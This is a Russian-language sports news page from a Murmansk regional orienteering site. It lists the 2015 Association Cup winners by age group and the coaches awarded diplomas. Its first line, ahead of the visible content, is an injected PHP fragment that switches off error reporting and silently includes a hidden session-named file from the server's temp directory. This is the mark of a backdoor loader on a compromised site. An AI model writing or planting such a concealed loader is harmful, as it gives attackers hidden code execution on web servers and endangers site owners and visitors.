error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?> Поздравляем победителей и призёров соревнований «Кубок Ассоциации спортивного ориентирования Мурманской области»!

Поздравляем победителей и призёров соревнований «Кубок Ассоциации спортивного ориентирования Мурманской области»!


Мурманские ориентировщики Кубок ассоциации

По решению Президиума Региональной общественной организации «Ассоциация спортивного ориентирования Мурманской области» в летнем спортивном сезоне 2015 года прошли Областные соревнования по виду спорта «спортивное ориентирование» «Кубок Ассоциации спортивного ориентирования Мурманской области».


В соревнованиях приняли участие 238 юных и взрослых спортсмена из 11 муниципальных образований: городов Апатиты, Кировск, Мончегорск, Мурманск, Оленегорск, ЗАТО Александровск, Видяево, Заозёрск, Североморск, Кольского и Терского районов. Наибольшую активность проявили юноши 15 – 16 лет. Количество участников соревнований в возрастной группе М 16 составило 63 человека.


Итоговые результаты соревнований были определены по наибольшей сумме очков, набранных каждым участником в индивидуальных стартах на четырёх этапах соревнований в соответствии с таблицей начисления очков.


Кубками и дипломами Региональной общественной организации «Ассоциация спортивного ориентирования Мурманской области» награждены спортсмены, занявшие первые места в каждой возрастной группе:


М 21 – Алиев Роман, город Мурманск

Ж 21 – Корпунова Наталья, город Апатиты

М 20 – Прусаков Алексей, город Мурманск

Ж 20 – Мельникова Алёна, город Мурманск, МГГУ

М 18 – Нехаев Денис, ЗАТО г. Североморск, СОШ № 8

Ж 18 – Николаенко Анастасия, ЗАТО г. Заозёрск, ЦДОД

М 16 – Халаман Вячеслав, город Мурманск, МОЦДОД «Лапландия»

Ж 16 – Котова Анастасия, Кольский район, ДЮСШ


Спортсмены, занявшие вторые места в каждой возрастной группе, награждены дипломами Региональной общественной организации «Ассоциация спортивного ориентирования Мурманской области»:


М 21 – Полежаев Алексей, город Мурманск

Ж 21 – Анисимова Ирина, город Кола

М 20 – Ханин Дмитрий, ЗАТО г. Североморск, СОШ № 8

Ж 20 – Мельникова Розалия, город Мурманск

М 18 – Дроздов Григорий, город Мурманск, гимназия № 6

Ж 18 – Зубанова Анастасия, город Мурманск, МОЦДОД «Лапландия»

М 16 – Шабалин Дмитрий, город Апатиты, СОШ № 14

Ж 16 – Дроздович Марина, Кольский район, ДЮСШ


Спортсмены, занявшие третьи места в каждой возрастной группе, награждены дипломами Региональной общественной организации «Ассоциация спортивного ориентирования Мурманской области»:


М 21 – Головко Сергей, город Апатиты

Ж 21 – Шумченко Татьяна, город Мурманск, МГГУ

М 20 – Перминов Никита, ЗАТО г. Североморск, СОШ № 8

Ж 20 – Перминова Екатерина, город Мурманск, МГГУ

М 18 – Витовский Никита, город Мурманск, МОЦДОД «Лапландия»

Ж 18 – Барковская Анастасия, Кольский район, ДЮСШ

М 16 – Хлопонин Павел, Кольский район, ДЮСШ

Ж 16 – Яковченко Мария, Кольский район, ДЮСШ


Дипломами Региональной общественной организации «Ассоциация спортивного ориентирования Мурманской области» награждены тренеры юниоров, юниорок, юношей, девушек, которые заняли первые, вторые и третьи места в своих возрастных группах:


Кислова Дарина Олеговна , педагог-организатор МОУ ДОД «Центр дополнительного образования детей» ЗАТО г. Заозёрск


Курбатова Инна Николаевна , тренер-преподаватель МОУДО Детско-юношеская спортивная школа Кольского района


Марудо Ольга Павловна , педагог дополнительного образования ГАОУМОДОД «Мурманский областной центр дополнительного образования детей «Лапландия»


Мельникова Ирина Витальевна , тренер-преподаватель МОУДО Детско-юношеская спортивная школа Кольского района


Чеснокова Лариса Анатольевна , преподаватель-организатор ОБЖ МБОУ средняя общеобразовательная школа № 8 ЗАТО г. Североморск


Чокалюк Михаил Иванович , учитель физкультуры МБОУ г. Мурманска Гимназия № 6


Чунин Александр Игоревич , старший преподаватель кафедры физической культуры, спорта и безопасности жизнедеятельности ФГБОУ ВО «Мурманский государственный гуманитарный университет»


Шабалин Александр Валентинович, сотрудник УФСИН России по Мурманской области


Итоговый протокол результатов соревнований

Яндекс.Метрика

Участник рейтинга лучших сайтов Рейтинг@Mail.ru

Рейтинг@Mail.ru

По всем вопросам обращайтесь по email: orient-murman.ru@mail.ru

© 2010 Спортивное ориентирование в Мурманской области. Все права защищены.
Вы здесь : Home